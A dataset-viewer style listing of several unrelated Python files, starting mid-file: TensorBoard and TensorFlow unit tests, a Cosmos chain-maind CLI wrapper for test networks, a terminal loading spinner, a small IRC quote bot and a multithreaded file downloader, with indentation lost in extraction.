expected = {'gs://~/foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotNormalizeGCSPath(self):
logdir_string = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRunNameWithGCSPath(self):
logdir_string = 'lol:gs://foo/path'
expected = {'gs://foo/path': 'lol'}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
class TensorBoardAssetsTest(test.TestCase):
def testTagFound(self):
tag = resource_loader.load_resource('tensorboard/TAG')
self.assertTrue(tag)
if __name__ == '__main__':
test.main()
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase):
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node 'seven"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
node_def = ops._NodeDef("op_type", "name")
node_def_orig = ops._NodeDef("op_type_orig", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(), original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 8)
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
def testForceGPU(self):
with self.assertRaisesRegexp(errors.InvalidArgumentError,
"Cannot assign a device to node"):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
def testAssertAllCloseAccordingToType(self):
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
def testRandomSeed(self):
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
if __name__ == "__main__":
googletest.main()
|
cosmoscli.py
|
import enum
import hashlib
import json
import tempfile
import threading
import time
import bech32
from dateutil.parser import isoparse
from .app import CHAIN
from .ledger import ZEMU_BUTTON_PORT, ZEMU_HOST, LedgerButton
from .utils import build_cli_args_safe, format_doc_string, interact
class ModuleAccount(enum.Enum):
FeeCollector = "fee_collector"
Mint = "mint"
Gov = "gov"
Distribution = "distribution"
BondedPool = "bonded_tokens_pool"
NotBondedPool = "not_bonded_tokens_pool"
IBCTransfer = "transfer"
@format_doc_string(
options=",".join(v.value for v in ModuleAccount.__members__.values())
)
def module_address(name):
"""
get address of module accounts
:param name: name of module account, values: {options}
"""
data = hashlib.sha256(ModuleAccount(name).value.encode()).digest()[:20]
return bech32.bech32_encode("cro", bech32.convertbits(data, 8, 5))
class ChainCommand:
def __init__(self, cmd=None):
self.cmd = cmd or CHAIN
def __call__(self, cmd, *args, stdin=None, **kwargs):
"execute chain-maind"
args = " ".join(build_cli_args_safe(cmd, *args, **kwargs))
return interact(f"{self.cmd} {args}", input=stdin)
class CosmosCLI:
"the apis to interact with wallet and blockchain"
def __init__(
self,
data_dir,
node_rpc,
chain_id=None,
cmd=None,
zemu_address=ZEMU_HOST,
zemu_button_port=ZEMU_BUTTON_PORT,
):
self.data_dir = data_dir
if chain_id is None:
self._genesis = json.load(open(self.data_dir / "config" / "genesis.json"))
self.chain_id = self._genesis["chain_id"]
else:
self.chain_id = chain_id
self.node_rpc = node_rpc
self.raw = ChainCommand(cmd)
self.leger_button = LedgerButton(zemu_address, zemu_button_port)
self.output = None
self.error = None
def node_id(self):
"get tendermint node id"
output = self.raw("tendermint", "show-node-id", home=self.data_dir)
return output.decode().strip()
def delete_account(self, name):
"delete wallet account in node's keyring"
return self.raw(
"keys",
"delete",
name,
"-y",
"--force",
home=self.data_dir,
output="json",
keyring_backend="test",
)
def create_account(self, name, mnemonic=None):
"create new keypair in node's keyring"
if mnemonic is None:
output = self.raw(
"keys",
"add",
name,
home=self.data_dir,
output="json",
keyring_backend="test",
)
else:
output = self.raw(
"keys",
"add",
name,
"--recover",
home=self.data_dir,
output="json",
keyring_backend="test",
stdin=mnemonic.encode() + b"\n",
)
return json.loads(output)
def create_account_ledger(self, name):
"create new ledger keypair"
def send_request():
try:
self.output = self.raw(
"keys",
"add",
name,
"--ledger",
home=self.data_dir,
output="json",
keyring_backend="test",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
for _ in range(0, 3):
self.leger_button.press_right()
time.sleep(0.2)
self.leger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def init(self, moniker):
"the node's config is already added"
return self.raw(
"init",
moniker,
chain_id=self.chain_id,
home=self.data_dir,
)
def validate_genesis(self):
return self.raw("validate-genesis", home=self.data_dir)
def add_genesis_account(self, addr, coins, **kwargs):
return self.raw(
"add-genesis-account",
addr,
coins,
home=self.data_dir,
output="json",
**kwargs,
)
def gentx(self, name, coins, min_self_delegation=1, pubkey=None):
return self.raw(
"gentx",
name,
coins,
min_self_delegation=str(min_self_delegation),
home=self.data_dir,
chain_id=self.chain_id,
keyring_backend="test",
pubkey=pubkey,
)
def collect_gentxs(self, gentx_dir):
return self.raw("collect-gentxs", gentx_dir, home=self.data_dir)
def status(self):
return json.loads(self.raw("status", node=self.node_rpc))
def block_height(self):
return int(self.status()["SyncInfo"]["latest_block_height"])
def block_time(self):
return isoparse(self.status()["SyncInfo"]["latest_block_time"])
def balance(self, addr):
coin = json.loads(
self.raw(
"query", "bank", "balances", addr, output="json", node=self.node_rpc
)
)["balances"]
if len(coin) == 0:
return 0
coin = coin[0]
return int(coin["amount"])
def distribution_commission(self, addr):
coin = json.loads(
self.raw(
"query",
"distribution",
"commission",
addr,
output="json",
node=self.node_rpc,
)
)["commission"][0]
return float(coin["amount"])
def distribution_community(self):
coin = json.loads(
self.raw(
"query",
"distribution",
"community-pool",
output="json",
node=self.node_rpc,
)
)["pool"][0]
return float(coin["amount"])
def distribution_reward(self, delegator_addr):
coin = json.loads(
self.raw(
"query",
"distribution",
"rewards",
delegator_addr,
output="json",
node=self.node_rpc,
)
)["total"][0]
return float(coin["amount"])
def address(self, name, bech="acc"):
output = self.raw(
"keys",
"show",
name,
"-a",
home=self.data_dir,
keyring_backend="test",
bech=bech,
)
return output.strip().decode()
def account(self, addr):
return json.loads(
self.raw(
"query", "auth", "account", addr, output="json", node=self.node_rpc
)
)
def supply(self, supply_type):
return json.loads(
self.raw("query", "supply", supply_type, output="json", node=self.node_rpc)
)
def validator(self, addr):
return json.loads(
self.raw(
"query",
"staking",
"validator",
addr,
output="json",
node=self.node_rpc,
)
)
def validators(self):
return json.loads(
self.raw(
"query", "staking", "validators", output="json", node=self.node_rpc
)
)["validators"]
def staking_params(self):
return json.loads(
self.raw("query", "staking", "params", output="json", node=self.node_rpc)
)
def staking_pool(self, bonded=True):
return int(
json.loads(
self.raw("query", "staking", "pool", output="json", node=self.node_rpc)
)["bonded_tokens" if bonded else "not_bonded_tokens"]
)
def transfer(self, from_, to, coins, generate_only=False, fees=None):
return json.loads(
self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else None,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
fees=fees,
)
)
def transfer_from_ledger(self, from_, to, coins, generate_only=False, fees=None):
def send_request():
try:
self.output = self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else "",
"--ledger",
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
fees=fees,
sign_mode="amino-json",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
for _ in range(0, 11):
self.leger_button.press_right()
time.sleep(0.4)
self.leger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def get_delegated_amount(self, which_addr):
return json.loads(
self.raw(
"query",
"staking",
"delegations",
which_addr,
home=self.data_dir,
chain_id=self.chain_id,
node=self.node_rpc,
output="json",
)
)
def delegate_amount(self, to_addr, amount, from_addr):
return json.loads(
self.raw(
"tx",
"staking",
"delegate",
to_addr,
amount,
"-y",
home=self.data_dir,
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
# to_addr: croclcl1... , from_addr: cro1...
def unbond_amount(self, to_addr, amount, from_addr):
return json.loads(
self.raw(
"tx",
"staking",
"unbond",
to_addr,
amount,
"-y",
home=self.data_dir,
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
# to_validator_addr: crocncl1... , from_from_validator_addraddr: crocl1...
def redelegate_amount(
self, to_validator_addr, from_validator_addr, amount, from_addr
):
return json.loads(
self.raw(
"tx",
"staking",
"redelegate",
from_validator_addr,
to_validator_addr,
amount,
"-y",
home=self.data_dir,
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
# from_delegator can be account name or address
def withdraw_all_rewards(self, from_delegator):
return json.loads(
self.raw(
"tx",
"distribution",
"withdraw-all-rewards",
"-y",
from_=from_delegator,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def make_multisig(self, name, signer1, signer2):
self.raw(
"keys",
"add",
name,
multisig=f"{signer1},{signer2}",
multisig_threshold="2",
home=self.data_dir,
keyring_backend="test",
output="json",
)
def sign_multisig_tx(self, tx_file, multi_addr, signer_name):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
multisig=multi_addr,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def encode_signed_tx(self, signed_tx):
return self.raw(
"tx",
"encode",
signed_tx,
)
def sign_single_tx(self, tx_file, signer_name):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def combine_multisig_tx(self, tx_file, multi_name, signer1_file, signer2_file):
return json.loads(
self.raw(
"tx",
"multisign",
tx_file,
multi_name,
signer1_file,
signer2_file,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def broadcast_tx(self, tx_file):
return json.loads(self.raw("tx", "broadcast", tx_file, node=self.node_rpc))
def unjail(self, addr):
return json.loads(
self.raw(
"tx",
"slashing",
"unjail",
"-y",
from_=addr,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def create_validator(
self,
amount,
moniker=None,
commission_max_change_rate="0.01",
commission_rate="0.1",
commission_max_rate="0.2",
min_self_delegation="1",
identity="",
website="",
security_contact="",
details="",
):
"""MsgCreateValidator
create the node with create_node before call this"""
pubkey = (
self.raw(
"tendermint",
"show-validator",
home=self.data_dir,
)
.strip()
.decode()
)
return json.loads(
self.raw(
"tx",
"staking",
"create-validator",
"-y",
from_=self.address("validator"),
amount=amount,
pubkey=pubkey,
min_self_delegation=min_self_delegation,
# commision
commission_rate=commission_rate,
commission_max_rate=commission_max_rate,
commission_max_change_rate=commission_max_change_rate,
# description
moniker=moniker,
identity=identity,
website=website,
security_contact=security_contact,
details=details,
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def edit_validator(
self,
commission_rate=None,
moniker=None,
identity=None,
website=None,
security_contact=None,
details=None,
):
"""MsgEditValidator"""
options = dict(
commission_rate=commission_rate,
# description
moniker=moniker,
identity=identity,
website=website,
security_contact=security_contact,
details=details,
)
return json.loads(
self.raw(
"tx",
"staking",
"edit-validator",
"-y",
from_=self.address("validator"),
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
**{k: v for k, v in options.items() if v is not None},
)
)
def gov_propose(self, proposer, kind, proposal):
if kind == "software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
proposal["name"],
"-y",
from_=proposer,
# content
title=proposal.get("title"),
description=proposal.get("description"),
upgrade_height=proposal.get("upgrade-height"),
upgrade_time=proposal.get("upgrade-time"),
upgrade_info=proposal.get("upgrade-info"),
deposit=proposal.get("deposit"),
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
elif kind == "cancel-software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
"-y",
from_=proposer,
# content
title=proposal.get("title"),
description=proposal.get("description"),
deposit=proposal.get("deposit"),
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
else:
with tempfile.NamedTemporaryFile("w") as fp:
json.dump(proposal, fp)
fp.flush()
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
fp.name,
"-y",
from_=proposer,
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_vote(self, voter, proposal_id, option):
print(voter)
print(proposal_id)
print(option)
return json.loads(
self.raw(
"tx",
"gov",
"vote",
proposal_id,
option,
"-y",
from_=voter,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_deposit(self, depositor, proposal_id, amount):
return json.loads(
self.raw(
"tx",
"gov",
"deposit",
proposal_id,
amount,
"-y",
from_=depositor,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def query_proposals(self, depositor=None, limit=None, status=None, voter=None):
return json.loads(
self.raw(
"query",
"gov",
"proposals",
depositor=depositor,
count_total=limit,
status=status,
voter=voter,
output="json",
node=self.node_rpc,
)
)
def query_proposal(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"proposal",
proposal_id,
output="json",
node=self.node_rpc,
)
)
def query_tally(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"tally",
proposal_id,
output="json",
node=self.node_rpc,
)
)
def ibc_transfer(
self,
from_,
to,
amount,
channel, # src channel
target_version, # chain version number of target chain
i=0,
):
return json.loads(
self.raw(
"tx",
"ibc-transfer",
"transfer",
"transfer", # src port
channel,
to,
amount,
"-y",
# FIXME https://github.com/cosmos/cosmos-sdk/issues/8059
"--absolute-timeouts",
from_=from_,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
packet_timeout_height=f"{target_version}-10000000000",
packet_timeout_timestamp=0,
)
)
def export(self):
return self.raw("export", home=self.data_dir)
def unsaferesetall(self):
return self.raw("unsafe-reset-all")
def create_plan(self, owner, title, description, price, cron_spec, duration_secs):
return json.loads(
self.raw(
"tx",
"subscription",
"create-plan",
"-y",
from_=owner,
title=title,
description=description,
price=price,
cron_spec=cron_spec,
duration_secs=duration_secs,
chain_id=self.chain_id,
home=self.data_dir,
keyring_backend="test",
node=self.node_rpc,
)
)
def query_plans(self):
return json.loads(
self.raw(
"query", "subscription", "plans", output="json", node=self.node_rpc
)
)["plans"]
def query_plan(self, plan_id):
return json.loads(
self.raw(
"query",
"subscription",
"plan",
plan_id,
output="json",
node=self.node_rpc,
)
)
def create_subscription(self, plan_id, subscriber):
return json.loads(
self.raw(
"tx",
"subscription",
"subscribe",
"-y",
plan_id=plan_id,
from_=subscriber,
chain_id=self.chain_id,
home=self.data_dir,
keyring_backend="test",
node=self.node_rpc,
)
)
def query_subscription(self, subscription_id):
return json.loads(
self.raw(
"query",
"subscription",
"subscription",
subscription_id,
output="json",
node=self.node_rpc,
)
)
|
loading.py
|
"""Context manager for pretty terminal loading bars
"""
# %% stdlib
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep
# %% Context Manager
class Loader:
def __init__(self, desc="Loading...", end="Done!", timeout=0.5):
"""
A loader-like context manager
Args:
desc (str, optional): The loader's description. Defaults to "Loading...".
end (str, optional): Final print. Defaults to "Done!".
timeout (float, optional): Sleep time between prints. Defaults to 0.1.
"""
self.desc = desc
self.end = end
self.timeout = timeout
self._thread = Thread(target=self._animate, daemon=True)
self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
self.done = False
def start(self):
self._thread.start()
return self
def _animate(self):
for c in cycle(self.steps):
if self.done:
break
print(f"\r{self.desc} {c}", flush=True, end="")
sleep(self.timeout)
def __enter__(self):
self.start()
def stop(self):
self.done = True
cols = get_terminal_size((80, 20)).columns
print("\r" + " " * cols, end="", flush=True)
print(f"\r{self.end}", flush=True)
def __exit__(self, exc_type, exc_value, tb):
# handle exceptions with those variables ^
self.stop()
if __name__ == "__main__":
with Loader("Loading with context manager..."):
for i in range(10):
sleep(0.25)
loader = Loader("Loading with object...", "That was fast!", 0.05).start()
for i in range(10):
sleep(0.25)
loader.stop()
|
dircbot.py
|
#!/usr/bin/env python3.4
# dircbot 0.1 - a Python IRC bot
# by Duy Nguyen
# import system modules
import random
import socket
import sys
import time
import threading
# import my own modules in modules/ subfolder
import modules.quote as quote
import modules.misc as misc
import modules.pingpong as pingpong
# configuration
# all string configuration must be set with a "b" prefix (typecasting variables
# as bytes in order for Python to communicate with server through sockets)
# bot's nickname
nickname = b"dircbot"
# server, port and socket buffer size
#
# irc server address and port
# 6667 is the default insecure irc port of all popular irc servers
server = b"irc.freenode.net"
port = 6667
# buffer size
# from Python socket documentation: "the value of bufsize should be a
# relatively small power of 2, for example, 4096"
# so you can leave buffer_size as it is
buffer_size = 4096
# channel to join
channel = b"##py_irc_test4235"
# random quoting configuration
# quote database
filename = "quote.txt"
# minimum and maximum interval between sending each quote (in seconds)
min_interval = 20
max_interval = 40
# debug mode
debug = True
# seed the rng with the system's current time for random quoting later on
random.seed()
# create an internet socket and connect to the IRC server
irc = socket.socket()
irc.connect((server, port))
def main():
# authorize with server
# send bot's nickname
irc.send(b"NICK " + nickname + b"\r\n")
# send bot's identification using the USER command
# RFC 2812 compliant
irc.send(b"USER dirc 0 * :dircbot\r\n")
# join the predefined channel
irc.send(b"JOIN " + channel + b"\r\n")
print("dircbot 0.1 running. Press Ctrl+C to stop.")
# loop for as long as the connection is alive
while True:
# initialize a buffer for socket data stream
buffer_data = irc.recv(buffer_size)
if debug == True: # print buffer data if debug mode is on
print(buffer_data)
else:
pass
# rudimentary chat parsing, should be reworked sometime in the future
# as this has a lot of drawbacks
# keep-alive ping, greeting and about commands
# respond to server's PING command to keep connection alive
if buffer_data.find(b"PING") != -1:
misc.ping(irc, buffer_data)
# when an user joins the channel, the buffer stream will receive
# a JOIN command. if a JOIN is found, send out a greeting
if buffer_data.find(b"JOIN") != -1:
misc.greet(irc, channel)
# when users type !about into chat, reply with version information
if buffer_data.find(b":!about\r\n") != -1:
misc.about(irc, channel)
# ping-pong feature
# if users send a "ping" message, reply with "pong"
# there is distinction between lower and uppercase "ping"
if buffer_data.find(b":ping\r\n") != -1:
pingpong.pingpong(irc, channel, False)
elif buffer_data.find(b":PING\r\n") != -1:
pingpong.pingpong(irc, channel, True)
def quoting(socket, channel, filename):
while True:
# randomize the interval between quotations
interval = random.randint(min_interval, max_interval)
# sleep for that amount of time
time.sleep(interval)
# send a random quote from <filename>
# text file MUST be in utf-8 encoding, or it will mess with
# the display of international characters in chat
quote.quote(socket, channel, filename)
# showtime
def run():
try:
# 2 threads running concurrently to prevent I/O or
# timer blocking misc functions
# main thread that parses IRC stream for chat commands
threading.Thread(target=main).start()
# another thread runs concurrently to provide quotations
threading.Thread(target=quoting, args=(irc, channel, filename)).start()
# handling SIGINT or EOF gracefully
# quit the channel, close socket and exit the program
except KeyboardInterrupt or EOFError:
misc.quit(irc, channel)
irc.close()
print("Bot terminated.")
sys.exit()
run()
|
downloader.py
|
import os
import time
import shutil
import threading
import requests
import retry
from config import TEMP_FOLDER
# 多线程下载
# 来自 https://www.cnblogs.com/weiyinfu/p/8126063.html
# @JiangGua 进行了一些修改
def multithread_download(url, path, debug=False):
PER_THREAD_MIN = 2000 # 每个线程至少下载量
MAX_THREAD_COUNT = 50 # 最多线程数
begTime = time.time()
resp = requests.get(url, stream=True)
sz = int(resp.headers['Content-Length'])
block_sz = max(sz // MAX_THREAD_COUNT, PER_THREAD_MIN)
task = []
cnt = 0
for i in range(0, sz, block_sz):
now_sz = sz - i if sz - i - block_sz < PER_THREAD_MIN else block_sz
it = {
'beg': i,
'end': i + now_sz,
'path': os.path.join(TEMP_FOLDER, str(cnt)),
'last': i + now_sz == sz
}
task.append(it)
cnt += 1
if it['last']:
break
lock = threading.Lock()
def merge():
with open(path, "wb") as f:
for j, i in enumerate(task):
with open(i['path'], 'rb') as ff:
f.write(ff.read(i['end'] - i['beg']))
endTime = time.time()
if debug:
print(endTime - begTime)
@retry.retry(tries=100)
def go(it):
nonlocal cnt
if debug:
print(it)
resp = requests.get(url, headers={
'Range': "bytes=%d-%d" % (it['beg'], it['end'] - 1)
})
if resp.status_code not in [200, 206]:
if debug:
print(it, resp.status_code, '服务器响应异常')
raise Exception("服务器响应异常")
if len(resp.content) != it['end'] - it['beg']:
if debug:
print("文件切片长度不正确")
raise Exception("文件切片长度不正确")
with open(it['path'], 'wb') as f:
f.write(resp.content)
if debug:
print(it, it['end'] - it['beg'], len(resp.content), 'over', resp.status_code)
lock.acquire(timeout=0)
cnt -= 1
if cnt == 0:
merge()
lock.release()
def start_threading():
threads = []
for i in task:
threads.append(threading.Thread(target=go, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
start_threading()
if __name__ == "__main__":
if not os.path.exists(TEMP_FOLDER):
os.mkdir(TEMP_FOLDER)
multithread_download('https://csdnimg.cn/public/common/toolbar/images/csdnqr@2x.png', '下载/a.png', debug=True)
shutil.rmtree(TEMP_FOLDER)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.